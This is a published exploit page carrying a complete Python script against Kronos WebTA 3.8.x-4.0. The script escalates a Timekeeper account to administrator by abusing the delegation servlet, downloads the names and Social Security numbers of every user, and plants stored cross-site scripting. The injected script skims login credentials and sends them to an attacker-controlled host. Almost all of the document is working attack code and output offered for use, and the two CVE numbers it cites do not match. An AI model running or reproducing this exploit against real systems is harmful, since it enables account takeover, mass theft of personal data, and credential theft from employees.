kronos webta 4.0 authenticated remote privilege escalation

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kronos webta 4.0 authenticated remote privilege escalation Code Code...
# Exploit Title: Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation # Discovered by: Elwood Buck & Nolan B. Kennedy of Mindpoint Group # Exploit Author: Nolan B. Kennedy (nxkennedy) # Discovery date: 2019-09-20 # Vendor Homepage: # Version: 3.8.x - 4.0 affected. (Exploit tested on v3.8.6.79029) # Tested on: Linux # CVE: (Remote Privesc) CVE-2020-8495 | (Stored XSS) CVE-2020-8493 # Usage: python3 http://target #!/bin/bash/python3 ### # *Exploit requires credentials with Timekeeper or Supervisor privileges # # Exploit abuses delegation privs present in the WebTA "/servlet/com.threeis.webta.H491delegate" # servlet. By specifying the "delegate" and "delegatorUserId" parameter an attacker can use an # admin user id to delegate role 5 (aka admin privs) to any other known user id, including oneself. # # selFunc=add&selRow=&delegate=<ATTACKER>&delegateRole=5&delegatorEmpId=1234&delegatorUserId=<ADMIN> # # With our new admin account, we can abuse a stored XSS vulnerability present in the login page, # banner (displayed on every page) & password reset page. We can also pull system information and # download a file containing the FULL NAME AND SSN OF EVERY USER in the database (typically thousands). # # # Below is an example of the exploit output: ##### # [+] Logged in as 'TESTER' with roles: Employee, Timekeeper # # [+] Available Admin Accounts: # MOTOKO # BATOU # TOGUSA # ISHIKAWA # # [-] Attempting to use account 'MOTOKO' to delegate Admin privs to 'TESTER'... # # [+] 'TESTER' successfully elevated to Admin privs :) # # # [+] Logged in as 'TESTER' with roles: Employee, Timekeeper, Admin # # [+] Webta Version Information # Site parameter: company # Licensed modules:WEBTA-LEAVE, WEBTA, WEBTA # webTA Servlet Version: # webTA Database Version: # App Server OS: Linux version 3.10.0-1062.1.1.el7.x86_64 (amd64) # App Server JDK Version: Oracle Corporation version 1.8.0_222 # App Server Servlet Engine: Apache Tomcat/7.0.76 (Servlet API 3.0) # App Server JDBC Driver: Oracle JDBC driver version # Database Version: Oracle JDBC driver version # Database Connection: jdbc:oracle:thin:@//<br>connected as user WEBTASVC # # [-] Downloading names and SSNs... # # [+] Complete. 5020 users written to file 'WebTA-PII.xls' # [+] Sample Content: # USERID,Last Name,First Name,Middle Name,SSN,Supervisor ID,Timekeeper ID,Organization,Pay Period,Active Status, # MOTOKO,Kusanagi,Major,M.,987-65-4321,ARAMAKI,ARAMAKI,SECTION9,19,Active, # # [+] Stored XSS attack complete :) ##### import re from requests import Request, Session from sys import argv, exit banner = """### # Kronos WebTA 3.8.x - 4.0 Authenticated Remote Privilege Escalation & Stored XSS Exploit # Discovered by: Elwood Buck & Nolan B. Kennedy of Mindpoint Group # Exploit Author: Nolan B. Kennedy (nxkennedy) # Discovery date: 20 SEPT 2019 # Vendor Homepage: # Version: 3.8.x - 4.0 affected. (Exploit tested on v3.8.6.79029) # Tested on: Linux # CVE: (Remote Privesc) CVE-2020-8494 | (Stored XSS) CVE-2020-8493 # Usage: python3 http://target ###""" base_url = argv[1] username = "TESTER" password = "password!1234" # set to True if you want to also exploit Stored XSS xss = False # xss strings can be injected into 3 different 'banner' locations (feel free to modify content) # WILL NOT ERASE CONTENT ALREADY IN APPLICATION xss_login_page = """ <script> /* steals login creds each time a user logs in and forwards them to attacker ip */ var attacker = ""; /* don't forget to set up a listener (python3 -m http.server 80) */ function stealCreds() { var username = document.frm[1].value; var password = document.frm[2].value; img = new Image(); img.src = "http://"+attacker+"/?"+ "username=" +username+ "&" + "password=" +escape(password); setTimeout('document.frm.submit();', 1000); return false; } function readyToSteal() { document.frm.onsubmit = stealCreds; } /* special for WebTA because otherwise the script loads before the DOM and password form */ document.addEventListener("DOMContentLoaded", readyToSteal); </script> """ xss_banner_everypage = "" xss_passwordchange_page = "" s = Session() adm_list = [] def web_req(url, data): print() req = Request('POST', url, data=data) prepared = s.prepare_request(req) resp = s.send(prepared, allow_redirects=True, verify=False) return resp def killActiveSession(): url = base_url + "/servlet/com.threeis.webta.H111multipleLogin" data = {"selFunc":"continue"} resp = web_req(url, data) def checkPrivs(): url = base_url + "/servlet/com.threeis.webta.HGateway" data = {} resp = web_req(url, data) html = resp.text activeSession = roles = re.findall(r'(.*?)You have an active session open at a another browser(.*?)\.', html) roles = re.findall(r'(.*?)type\="button"(.*?)>', html) if activeSession: print("[-] Killing active session...") killActiveSession() login() elif roles: roles_list = [] for role in roles: role = role[1].split('"')[1] roles_list.append(role) print("[+] Logged in as '{}' with roles: {}".format(username, ', '.join(roles_list))) else: print("[!] Account does not have required Timekeeper or Supervisor privs") exit() def login(): url = base_url + "/servlet/com.threeis.webta.H110login" data = {"j_username": username, "j_password": password, "login": "++Log+In++"} resp = web_req(url, data) if resp.status_code != 200: print("[!] Failed login in as '{}'".format(username)) exit() checkPrivs() def findAdmins(): url = base_url + "/servlet/com.threeis.webta.H940searchUser" data = { "selFunc":"search", "return_page":"com.threeis.webta.P491delegate", "return_variable":"delegate", "search_org":"0", "search_role":"Administrator", "actingRole":"2", "payload_name_0":"selFunc", "payload_val_0":"search", "payload_name_1":"selRow", "payload_name_2":"delegate", "payload_name_3":"delegateRole", "payload_val_3":"2", "payload_name_4":"delegatorEmpId", "payload_val_4":"15667", # might need a valid user id "payload_name_5":"delegatorUserId", "payload_val_5":username, } resp = web_req(url, data) html = resp.text adm_usrs = re.findall(r'<TD CLASS\="bckGray">(.*?)\n', html) print("[+] Available Admin Accounts:") for snip in adm_usrs: adm = snip.split('</TD><TD CLASS="bckGray">')[2] adm_list.append(adm) print(adm) def privesc(): url = base_url + "/servlet/com.threeis.webta.H491delegate" data = { "selFunc":"add", "delegate":username, "delegateRole":"5", "delegatorEmpId":"1234", "delegatorUserId":adm_list[0], } print() print("[-] Attempting to use account '{}' to delegate Admin privs to '{}'...".format(adm_list[0], username)) resp = web_req(url, data) print("[+] '{}' successfully elevated to Admin privs :)".format(username)) def storeXSS(): url = base_url + "/servlet/com.threeis.webta.H261configMenu" data = {'selFunc':'messages'} ### to be covert we want to append our js to the end of * messages/banners already there * resp = web_req(url, data) html = resp.text messages = re.findall(r'<TEXTAREA name\=(.*?)</textarea>', html, re.DOTALL) messages_clean = [] for message in messages: message = message.split('wrap="virtual">')[1] messages_clean.append(message) login_page = messages_clean[0] banner_everypage = messages_clean[1] passwordchange_page = messages_clean[2] ### now we inject our javascript url = base_url + "/servlet/com.threeis.webta.H201config" data = { "selFunc":"save", "loginMessage": login_page + xss_login_page, "bannerMessage": banner_everypage + xss_banner_everypage, "passwordMessage": passwordchange_page + xss_passwordchange_page, } resp = web_req(url, data) print("[+] Stored XSS attack complete :)") def stealPII(): url = base_url + "/servlet/com.threeis.webta.H287userRoleReport" data = { "selFunc":"downloademp", "roletype":"1", "orgsel":"0", "pageNum":"1", } print("[-] Downloading names and SSNs...") resp = web_req(url, data) filename = "WebTA-PII.xls" with open(filename, 'wb') as f: f.write(resp.content) with open(filename) as f: for i, l in enumerate(f): pass count = i # does not include header print("[+] Complete. {} users written to file '{}'".format(count, filename)) print("[+] Sample Content:") with open(filename) as f: for n in range(2): print(",".join(f.readline().split("\t")), end="") def dumpSysInfo(): url = base_url + "/servlet/com.threeis.webta.H200mnuAdmin" data = {"selFunc":"about"} resp = web_req(url, data) html = resp.text data = re.findall(r'<INPUT VALUE\="(.*?)"', html, re.DOTALL) print("[+] " + data[0]) if __name__ == '__main__': print(banner) login() findAdmins() privesc() login() # login again because we need the refreshed perms after privesc dumpSysInfo() #stealPII() if xss: storeXSS() s.close()

Kronos webta 4.0 authenticated remote privilege escalation Vulnerability / Exploit Source : Kronos webta 4.0 authenticated remote privilege escalation

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